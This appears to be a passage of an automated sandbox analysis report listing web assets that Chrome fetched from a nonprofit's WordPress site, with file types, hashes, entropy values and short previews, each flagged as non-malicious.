                                                                                                                                                                                                                              Preview:/*! jQuery UI - v1.13.3 - 2024-04-26.* https://jqueryui.com.* Includes: widget.js, position.js, data.js, disable-selection.js, effect.js, effects/effect-blind.js, effects/effect-bounce.js, effects/effect-clip.js, effects/effect-drop.js, effects/effect-explode.js, effects/effect-fade.js, effects/effect-fold.js, effects/effect-highlight.js, effects/effect-puff.js, effects/effect-pulsate.js, effects/effect-scale.js, effects/effect-shake.js, effects/effect-size.js, effects/effect-slide.js, effects/effect-transfer.js, focusable.js, form-reset-mixin.js, jquery-patch.js, keycode.js, labels.js, scroll-parent.js, tabbable.js, unique-id.js, widgets/accordion.js, widgets/autocomplete.js, widgets/button.js, widgets/checkboxradio.js, widgets/controlgroup.js, widgets/datepicker.js, widgets/dialog.js, widgets/draggable.js, widgets/droppable.js, widgets/menu.js, widgets/mouse.js, widgets/progressbar.js, widgets/resizable.js, widgets/selectable.js, widgets/selectmenu.js, widgets/slider.js, widgets/sort
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (21088)
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):22842
                                                                                                                                                                                                                              Entropy (8bit):4.74294751096444
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:t/nsql4LGNsnk28TtHunGZ2mMagdz9zhbE/jW2mzBXOoLBh3UvTL2mug+FNfFh+v:t/nsql4LGNsnk28TtHunGMmMagdz9Fb2
                                                                                                                                                                                                                              MD5:07E11FDEEDF7AF6CD9A4DE9C74803C06
                                                                                                                                                                                                                              SHA1:62E87C345D9C1975B7B6574B08D56930860F9213
                                                                                                                                                                                                                              SHA-256:E27C7A8DF6910B8868AD1A36B70FDE9042727CF69DD5176E581BF4D664C25CFC
                                                                                                                                                                                                                              SHA-512:A65920B42B4D2360598FF917F080AED6DCE9ACEC8C680D7CE99E80728DC446E24EFA184B08194CF7142D0D228CB5BE5549DF2999BB2CF0A289B39C2E7FF89599
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/uploads/elementor/css/post-7.css
                                                                                                                                                                                                                              Preview:.elementor-7 .elementor-element.elementor-element-6c46645:not(.elementor-motion-effects-element-type-background), .elementor-7 .elementor-element.elementor-element-6c46645 > .elementor-motion-effects-container > .elementor-motion-effects-layer{background-image:url("https://www.tacinc.org/wp-content/uploads/2020/11/wave-background-dark.jpg");background-position:center center;background-repeat:no-repeat;background-size:cover;}.elementor-7 .elementor-element.elementor-element-6c46645{transition:background 0.3s, border 0.3s, border-radius 0.3s, box-shadow 0.3s;padding:90px 0px 90px 0px;}.elementor-7 .elementor-element.elementor-element-6c46645 > .elementor-background-overlay{transition:background 0.3s, border-radius 0.3s, opacity 0.3s;}.elementor-7 .elementor-element.elementor-element-bc3ce5e .elementor-heading-title{color:#FFFFFF;}.elementor-7 .elementor-element.elementor-element-f392308 > .elementor-widget-container{padding:0px 0px 0px 0px;}.elementor-7 .elementor-element.elementor-eleme
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):7624
                                                                                                                                                                                                                              Entropy (8bit):7.976563736428915
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:vACd8JCF46xheJaKjXJ7JXlXe8U/ty83Ju:vAC+JCF9xheJaOJlXe8mt5u
                                                                                                                                                                                                                              MD5:AA2B88F743EC406AC145BF466B00709D
                                                                                                                                                                                                                              SHA1:DAD23AD09B3362E8FADC4E8EBE562FB446131559
                                                                                                                                                                                                                              SHA-256:978DC01343AF50AB4127FEF48142BC754ED220E034F0724348B311DFF0F4C631
                                                                                                                                                                                                                              SHA-512:F504EC57971E8655219381F599AED3BA3590424FF76156EE2BA28DCF4FABEEFA169ABD48ABD8DDC58EB2615333ED983A34817629F47380265DF047E8769C2687
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/uploads/2023/03/featImg_YAB-Series-Expanded-Edges@2400x1350px-367x266.png
                                                                                                                                                                                                                              Preview:RIFF....WEBPVP8L..../nAB...&..$..ACp....Za.R.md.Jp..<#$...v....}a..`......../b......w.\T.G......sKbFX.jEa.R.Kp....`\.}.s.....(.I@..$B.j.]......./..G....Y......V...K......M.........`d.....O.g....Tm>z./.X|....lZ..F....$..i....t.B........n.6. A...P+I..o...m.........>.......vu..1J..,..TZ^.c.7...v2...m...-k........J...l....<..@.).Qk....h...>!..kN.....m..$).q..@2..y..{....j..?$H..6..0.t.sz...$.i...D.O...i.'SK.G...wk..Q_..Qy&..O...N&9.89rC....7....... .I..z.....%y..)%..........M...]...3W...".z..R.Op..LFR....^..I.....s\4x...}..af...z.Q;...O.....|....j.....3...9.).../(?J'......u^7.0....}.)...,_...^..v....d...y....N.t.xa.t...h..ww76B.p.u.'<c.....*....#KI.x.n.K..0.*...$%a.!..d.E.u....I....2P..7....i....y]...X.}.S......\.0.G...u.H..W......"{;.H.G.#..(...*%.^....&.m.&`QJ..W.B...*.!..4$....s*.._..........7.L.x..z|7..,..[.l.r...N.#...(..c.a...:6.Y.~..b.?$N(H..*TG.z!TR.....road}...f..f..5p........M.j....{o...G(.!..:.)......d...6.my.g.....M.....F3
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (5945)
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):307547
                                                                                                                                                                                                                              Entropy (8bit):5.574957910212
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6144:z4z08438Vto4rnISDPLj0h6bmtikU7KlXiTR:Ez2sXo4YW4AR
                                                                                                                                                                                                                              MD5:684D8AB2F39AA35FFFB26D5D5E84628A
                                                                                                                                                                                                                              SHA1:A56D27F1756B5A17153CE178393DE63C618A5BD3
                                                                                                                                                                                                                              SHA-256:4AFB3443F2FE59599DA92B15C408B4E2EDBDEA9823B5307F5C53BE31657E4741
                                                                                                                                                                                                                              SHA-512:73A28FA3AEBCD3159AC62C3E7AD86137C86B4EB5712C6D19FCE5EB1AD6754FB508F4214D57E8EE93D714A296A9E2C145E45B33BDC60491D8E0EA20D5F5C26DC5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":12,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":"","vtp_countryValue":"",
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (6197), with CRLF line terminators
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):6231
                                                                                                                                                                                                                              Entropy (8bit):5.520497910160648
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:vt5aOb5pxD2FuQThrQD8WCcmHgCFAV8yg1ngARsELL3TiEW3rY8JWHerc9gJUxtk:TnD6uQ2CcmHg2ntLXDcr9kYO1jwPc+
                                                                                                                                                                                                                              MD5:3615EF6C6774A0A65DDBD275F8DEB9F0
                                                                                                                                                                                                                              SHA1:C608CE31C4CC2ED0007C030A689CB97367FDCD0B
                                                                                                                                                                                                                              SHA-256:FDD8EDF779FA4149E2975DF3BAFB7AC9504B8BFA7AA6DF59E00CE1F1EB23F09D
                                                                                                                                                                                                                              SHA-512:547701EA719E3A61335879135B6F2D7CFE1CFD368065249935732B9CA809144A28CCAAEA8302CEA7C3E34B9266945D229CF913CB4F1A71DA27CE5742CD89CC59
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/uploads/hummingbird-assets/a61b308d4d6be7261fc816f90a3413fb.css
                                                                                                                                                                                                                              Preview:/**handles:tablepress-default**/..@font-face{font-display:block;font-family:TablePress;font-style:normal;font-weight:400;src:url(data:application/font-woff2;charset=utf-8;base64,d09GMgABAAAAAAPUAA0AAAAACZAAAAN+AAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP0ZGVE0cGh4GYACCUhEICoQIgnILFgABNgIkAygEIAWGcgeBARv6B8iuBzK53oAhKg2KWDsrezjalSefocfD9/uZ575PSbYEqJHAIdo6tMDGdCprFIHd+F9r+rZE46O2iHBJfoAuxwW0yfgKS8KGVFE4dHX1gPmgVhzwhcJbReQ9RWXcraeutbmNHE7T7B1sex8stfMfnkvv0XsgUZrYO1hirXme9TnUkBvQ22RGX50VAr48H54Cn9b8GD73edAAhjboBpIQ6kKOhCz7GA8V5HfzyeA6h0mnrFTJnPjxC7KCrl9caqIUg0EAYACGDBn6YGCxeIE+EkwANTWJX/brZpNfyE5o/7r9uPZjS4tESbCTExLCjxOEbxGi2dQeNEAXUMMlvADkqSV0IHXtkQXNOnI2ctJpRIPt8+HjNivx3rlQYA8FqGwdCxF2aZrdJluMnaqFvy+yngVKbBcn0fSOd1xTpnW4HTkptV8Gi2kvCeUHC0BD+D0VKMIqXniZPJyPya9D7gT6DvUpwJER6avgKDsOfW9jU+YGc/ng6MhA3VSar3NdtvrD9WHZurKVKYOi0RwlY9500YSuWDE084F+jMinu4sTudD5yBTTozA9Horpmb+M3TwIBHempnzdpu1/raWypX0JND/ki4p71CQQlFqnAvkijABrVFIq5BdNJbFncoBOF03/h3IINPQRBxJCYDoAOnkRIDR0w0BSmYiBzDinAuQ6eROg0DEGY6DUiEUYqKyILwFq2q
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2360
                                                                                                                                                                                                                              Entropy (8bit):4.0458655423838605
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:RAF5MjQChDyz9/fBNIhcrqr7LsQXgT9mtjIw1wj:Crx1I+rqjs4m9Gwj
                                                                                                                                                                                                                              MD5:30A7CCA61782A5226153530C72951AD0
                                                                                                                                                                                                                              SHA1:BDF79CEB087C6D9F53E9716C7AF15A79554EC32F
                                                                                                                                                                                                                              SHA-256:6F4F5EF5BEED3809DE83AE132712F687794DDAA318A015BFA81AB5818AB33B28
                                                                                                                                                                                                                              SHA-512:22741BC9F47D74DB005EF38803A567D8F073F92999F007345CDEFA9DF0EA07C5E467257D62215B41FBD9BAB2B06637516838251498E4D1787B1969F8228D294F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview:<svg height="14" viewBox="0 0 14 14" width="14" xmlns="http://www.w3.org/2000/svg"><path d="m11.8173293 10.9730357-2.69789219-2.7010543c.32787132-.41266325.59016274-.89566041.78688522-1.449004.19672247-.55334358.29508217-1.13012606.29508217-1.73036309 0-.70340324-.1358299-1.36459329-.40749434-1.98358739-.26229612-.61899409-.62529009-1.15826244-1.08899285-1.61781914s-1.00468098-.82532181-1.62295029-1.09730316c-.61826931-.26260517-1.27868516-.39390462-1.98126478-.39390462-.70257961 0-1.3629939.13129945-1.98126478.39390462-.6182693.27198135-1.15924752.63774646-1.62295044 1.09730316-.46370245.4595567-.82669657.99882505-1.08899285 1.61781914-.27166415.6189941-.40749417 1.28018415-.40749417 1.98358739 0 .71278098.13583002 1.37866069.40749417 1.99765479.26229628.61899566.6252904 1.15826244 1.08899285 1.61781914.46370292.4595567 1.00468114.82532181 1.62295044 1.09730473.61827088.26260363 1.27868517.39390303 1.98126478.39390303.59953421 0 1.16627456-.098475 1.70023513-.29542805.533959-.1969531
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (18798)
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):18833
                                                                                                                                                                                                                              Entropy (8bit):5.198890693042313
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:ivzwv2QYnTte0KKscI1WxUy/gdLzrXmJUDWjFkgoKjJj5Sh6W0+:WwOQ2te0KaYrXm1hR5Uz
                                                                                                                                                                                                                              MD5:F88D5720BB454ED5D204CBDB56901F6B
                                                                                                                                                                                                                              SHA1:F1952292FDE4B15936E9AAC16B2B9896684DB95B
                                                                                                                                                                                                                              SHA-256:726B820E44F6AB90AD991D30A4BF26D3A5D71493CBCD1FB1EFD0D14E89B9DF2A
                                                                                                                                                                                                                              SHA-512:F7E3EC0C5B832116D75CAC2A5A40AB6FE673CC6C0996BD898F25850ED5555484D821E1FC4CA039C69DA3AB51FAA25613D622DB1177D7CDE16DA477145C3A6E22
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-includes/js/underscore.min.js
                                                                                                                                                                                                                              Preview:/*! This file is auto-generated */.!function(n,r){var t,e;"object"==typeof exports&&"undefined"!=typeof module?module.exports=r():"function"==typeof define&&define.amd?define("underscore",r):(n="undefined"!=typeof globalThis?globalThis:n||self,t=n._,(e=n._=r()).noConflict=function(){return n._=t,e})}(this,function(){var n="1.13.6",r="object"==typeof self&&self.self===self&&self||"object"==typeof global&&global.global===global&&global||Function("return this")()||{},e=Array.prototype,F=Object.prototype,V="undefined"!=typeof Symbol?Symbol.prototype:null,P=e.push,f=e.slice,s=F.toString,q=F.hasOwnProperty,t="undefined"!=typeof ArrayBuffer,u="undefined"!=typeof DataView,U=Array.isArray,W=Object.keys,z=Object.create,L=t&&ArrayBuffer.isView,$=isNaN,C=isFinite,K=!{toString:null}.propertyIsEnumerable("toString"),J=["valueOf","isPrototypeOf","toString","propertyIsEnumerable","hasOwnProperty","toLocaleString"],G=Math.pow(2,53)-1;function l(u,o){return o=null==o?u.length-1:+o,function(){for(var n=M
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1440x440, components 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7417
                                                                                                                                                                                                                              Entropy (8bit):6.96294349709708
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:3XgaoXMlj7oOoRKnX5o2o7ECBap2ZJJJJJJJJVPQ95ICwjx8rn:3XgXXMlj7aKJo24Ba6PQ95ICwjx8rn
                                                                                                                                                                                                                              MD5:9CDBA1B0B72DC4E6F9A1FBA7484FB4EC
                                                                                                                                                                                                                              SHA1:112204A0479FD669E9CB49B5F207984127958689
                                                                                                                                                                                                                              SHA-256:94FB3B7A35183CE222B869092C9F121478044220021A30838F3084C388A5D133
                                                                                                                                                                                                                              SHA-512:D35FD28378814CD4E0DD82416B873CD9C30879B8A879A4E9D2D0FF9B17ED5E29ACF744095C361B18D49AF36632D2299A6397F5CAB175EAAEC4D12C46135766B4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview:......JFIF...........................................$......$ &...& 9-''-9B747BOGGOd_d................................$......$ &...& 9-''-9B747BOGGOd_d.............."..............................................."...........................................................................................^......................3..x........................................................................5p......................+........................SL....e)v}....................UD@.8.......................).......%;-H................".:%.NSG........].t..............9....:...)JR.@......;n...........q.!...........9N@........@.......*.u...........vVJ.................0..............}@.......l......5B.............>.......Yu.....8..........g..............t...9EUW.......h...............o....i........R.....P........_w@..4........*.......E>.............s.H.......tD......T=`........v..G5........#.....).D......................@....s.............9..V]0......*......g.............f..'m.......
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 6 x 5
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):50
                                                                                                                                                                                                                              Entropy (8bit):3.8488255736198
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:CN+ltRPQEsJen2sSX:xvQEsJ42sSX
                                                                                                                                                                                                                              MD5:E4D673A55C5656F19EF81563FB10884C
                                                                                                                                                                                                                              SHA1:1F2D8ED221D39329251AD3A6FF1EDB20B7219443
                                                                                                                                                                                                                              SHA-256:F3A8992ACB9AB911E0FA4AE12F4B85EF8E61008619F13EE51C7A121FF87F63B1
                                                                                                                                                                                                                              SHA-512:E0B03411282A979CF772F700D9E5634B0C25C612E380AD33C0D59059B1B479D027016D5BEB148403EF185430DB35F5FAED362F36CE2C8ECAD0E6D8E30CEA97B4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview:GIF89a.............!.......,............bx..j....;
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 6 x 5
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):50
                                                                                                                                                                                                                              Entropy (8bit):3.8488255736198
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:CN+ltRPQEsJen2sSX:xvQEsJ42sSX
                                                                                                                                                                                                                              MD5:E4D673A55C5656F19EF81563FB10884C
                                                                                                                                                                                                                              SHA1:1F2D8ED221D39329251AD3A6FF1EDB20B7219443
                                                                                                                                                                                                                              SHA-256:F3A8992ACB9AB911E0FA4AE12F4B85EF8E61008619F13EE51C7A121FF87F63B1
                                                                                                                                                                                                                              SHA-512:E0B03411282A979CF772F700D9E5634B0C25C612E380AD33C0D59059B1B479D027016D5BEB148403EF185430DB35F5FAED362F36CE2C8ECAD0E6D8E30CEA97B4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://pixel.wp.com/g.gif?v=ext&blog=228569162&post=7&tz=-4&srv=www.tacinc.org&j=1%3A13.9.1&host=www.tacinc.org&ref=&fcp=7473&rand=0.7742469349941385
                                                                                                                                                                                                                              Preview:GIF89a.............!.......,............bx..j....;
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (40345), with CRLF, LF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):109545
                                                                                                                                                                                                                              Entropy (8bit):5.180662363440504
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:WtttVxFm61ikpCQ9HuGH5iwqWWN7KOljuOzQYqE30/RuHRXrYPH0KOiNmv4K1YER:Eu8jbxw/5czCQ8+UR
                                                                                                                                                                                                                              MD5:978774F27C0A3F66C3AF8F53CC17668F
                                                                                                                                                                                                                              SHA1:18B591FD6DA50C2D0F39D11E67505D2DEFE1D82C
                                                                                                                                                                                                                              SHA-256:DA479E5E375AE5C35B054568A7CCFFF76F2D4E4601CEF59BBB020E004F772FBC
                                                                                                                                                                                                                              SHA-512:243C284B2D9720572233703350DDE3D020BF3E62A769A0D727225024C44E09281C280A0348716841440537281037E1A8BD4164447E21F9B323381BFEAE681CD1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview:/**handles:elementor-pro-frontend,pro-elements-handlers,pp-tooltipster,pp-elements-tooltip**/../*! elementor-pro - v3.24.0 - 09-10-2024 */.(self.webpackChunkelementor_pro=self.webpackChunkelementor_pro||[]).push([[313],{3e3:(e,t,n)=>{"use strict";var s=n(6784);n(2258);var i=s(n(4906)),o=s(n(2450)),r=s(n(4409)),a=s(n(7937)),l=s(n(8098)),c=s(n(6275)),d=s(n(3268)),u=s(n(4992));class ElementorProFrontend extends elementorModules.ViewModule{onInit(){super.onInit(),this.config=ElementorProFrontendConfig,this.modules={},this.initOnReadyComponents()}bindEvents(){jQuery(window).on("elementor/frontend/init",this.onElementorFrontendInit.bind(this))}initModules(){let e={motionFX:i.default,sticky:o.default,codeHighlight:r.default,videoPlaylist:a.default,payments:l.default,progressTracker:c.default};elementorProFrontend.trigger("elementor-pro/modules/init:before"),elementorProFrontend.trigger("elementor-pro/modules/init/before"),e=elementorFrontend.hooks.applyFilters("elementor-pro/frontend/handlers
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 18912, version 1.0
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):18912
                                                                                                                                                                                                                              Entropy (8bit):7.990082418254605
                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                              SSDEEP:384:CLKW6NkVhiu1WriaLypzagzo7P16szIXIXhRtKoeuiw6MHmObKn:QbIyP1QLypza04Us6IXhTHcq2
                                                                                                                                                                                                                              MD5:7852D4DC26EF44DF58E23DC0B9722D6F
                                                                                                                                                                                                                              SHA1:431368901CBB2B965B5BED87414FA0F84D235B41
                                                                                                                                                                                                                              SHA-256:0792D5285778BB59DE16512D07ACE9D728A161C5006148717D9EEA6223EBF84B
                                                                                                                                                                                                                              SHA-512:784F3CFFFD89AF1AD63B95019913D3105C622501DDC396B34E18D96FDD3C325F45421BC35F0D97D97ED6ED82A0A7EC2DBE7CD22EFB703AEBD0E56CD136535BA5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/themes/tac-child/css/fonts/ibm-plex-sans-v8-latin-600.woff2
                                                                                                                                                                                                                              Preview:wOF2......I........T..I|.........................@..R..l.`....@..s.....X.....p..6.$..\. ..&..5..d..%....< .."..e.J.E.s.8.?....HP2..n..XV..(.T.J..D..1..l"....:ue*Es.....,]e.o.m.G7..o..G.....L.......YG...o.+\`....{....W.vK|....}.....o.S...._...P.G... .V>A2.....m..;3 -Q.@.."..X..E7..v..m..-<....L......[.........E....Hd."e ....7u,\T|..].ZWyU.........2d%......D..[g......Pk/......~..%..4.l....N..........:...4;j[.]ov..\R^.8.,A.5..........G...|........+)..MkW.....rb..ga..;.K..@.i.(.....#].3+..=.W...q...p.......0.Z..2.m.....&N...oV....j6Y........ ..Y.0(.....=..9....>D..U"...V(P.....d.o. .d..R......I.E.4.....!..Ue...0..hZ...,4l.9..1..)S..3...X.D\.H.C$...EgUn)^J....+W...\....e.+.(e..%....%u......\....@(...^...+....:.u..E.:..s.........;A..K....H.4....f.......F..t.A....\.~...R..d.....#.Tk.e.1.@A....:..*.....0Vq..p.o...^...N.)n. A......o..k......K=tC...y.f..W..qL..ZU1.....7."D.bv.{o.p...BQ.=.....$.......d..d3!s.......i.9. ....D.~dJ..N.;[@w.\...[.......{.
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:PNG image data, 984 x 368, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8293
                                                                                                                                                                                                                              Entropy (8bit):7.900379064928947
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:h333333333333yPU6UFi3QTFaSlAEAcxYwwz37QNiMUag10AcHDJvJc7u5FOw/qh:h333333333333yPiFkQfjAcOwwzLQyaK
                                                                                                                                                                                                                              MD5:019C7F6A1B2B430F3B73FA6631FA4520
                                                                                                                                                                                                                              SHA1:0EF0D67F1F538DAB3E6CDD993AC97BFBFCE348CD
                                                                                                                                                                                                                              SHA-256:B921B799C82F2725E7112CD49E3F58E714A0D0F252DA173CAE75F5880B402C0F
                                                                                                                                                                                                                              SHA-512:F77682B5F4974F7ED725F8D29C278D034AD2BAC66E97B38D85D6FDEFD243EA0A20BAF420DC3DEFB431B679387EDE9A7AF2C1967731429965A6E12BC76FA40E0D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview:.PNG........IHDR.......p.....t$#.....PLTELiq.1b.1b.1b.1b.1b.1b.1b.1b.1b.1b.1b.1b.1b.1b.1b.-b.-b.-b.-b.-b.-b....-b.-bs.!.-bj.&_|,b~*....-b.-b.-b.-b....-bn.#...\y..-b}..w.........t....f.(..."..Yw/"...r..y......."......m.....v. ..... ...............|........o.....}."..........."............|.......!..Xu0.I{.X.....N........t....!..<_@............Jj8....../SGt. ........................!...N....-RH..........6j8vg.1b.-b..."...k.+QI.L~.s.w...T.Vt1.?V.5i ....a}+6ZC.6\Lk7...........Ab=.=p....\..c........{..Dwl.% HPy7&....{tRNS..0...`.@. .p.P.@..... ..p.Wp.0`.P..<.....p..... W..@...........j.<t|0...P...d......=.q......L.J.[..f...............L0.....IDATx...[j.0...Y.lI........Oz .. ......%..T..................................................................c......E..(.nMi+...RJJ.....=.:.R.;....a....e...eK.8<.4.%.......L...M......JZ{U.....3.Q......3...njh..K./..X.%..q...%...mu2.UC..W..6...j....S-.p....2.m8..-q0y...>..5.iiFr..n...<o.?...o.6.......Sx..8.........Rg...S..YD..>...
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1440x708, components 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9727
                                                                                                                                                                                                                              Entropy (8bit):7.095186844124069
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:LOcBHC2WMBcT2YAdyCMP7hJSLeAUz5Fh9Vl726q:LHBHVWMI2nO3SaAGh9Vlin
                                                                                                                                                                                                                              MD5:072FAB50AB27AC10863D23EBDD74504E
                                                                                                                                                                                                                              SHA1:ED4047C5A8AD0F7A1976516B60D2CC0114E8A7AF
                                                                                                                                                                                                                              SHA-256:0A09B71983112B97C3525DE079B404BFAA10B244F2D079925C1E2FC7110C0DEA
                                                                                                                                                                                                                              SHA-512:43DB4F5C511DDDAF221DE736319FBB76B9137EFF98E58A2BF8FA77F3956F3A29BE29579828CF3D46832D3EA3A4C936F2A7B184BB161DDA208A8CA67DF181480B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview:......JFIF...........................................$......$ &...& 9-''-9B747BOGGOd_d................................$......$ &...& 9-''-9B747BOGGOd_d.............."..................................................(..P.....@..@....(.....P..(..(..P..@..@..@....(..h..P..P..(..P.....@..@....(.....P.<...(..P..@..@..@....(..h..P.y@..(..P.....@..@....(.....P....(..P..@..@..@....(..h..P........@(..P......P(....@..@<..h..P.....@4.P...@...P..(.......@...(....@P......@4....,...(..P..@..@..@....(..h..Py`......@(.........P(....@..C...h..P.....@4.P...@...P..(..X.....@...P....@.......@4........(..P..@..@..@....(.....W.........(..........(....@..|...h..P.....@4.P...@...P..(......(.....@(.@....(..(.........h..P.....@4.P...@...P..(.`....(.....@(.@....(..(.........h..P.....@4.P...@...P..(y.....(.....@(.@....(..(.....0...h..P......4.P...@...P..)......(.....@(.@....(..(.........h..P......4.P...@...P../......(.....@(.@....(..(.............@...P....@.......@4...........P......4..(......P.:.............(
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (24443), with CRLF, LF line terminators
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):54702
                                                                                                                                                                                                                              Entropy (8bit):5.29120585163207
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:/boHn8/VstmeOO53rV6U69IdtjcJtyva6nXYtqt9JtQtI7Tays+EmnRuGpzPqNYU:VO3r5W0FYczJS2PtmYVi
                                                                                                                                                                                                                              MD5:4DD99DAB5EA4B4599B19816252B7F172
                                                                                                                                                                                                                              SHA1:E6C1D6C317D32CB410EFECF4B8575E2C22D92E22
                                                                                                                                                                                                                              SHA-256:0E7C4B84651E399B437F6D8EBEE3F2AEB6A783D27CB27C2EE7527E9F510455E7
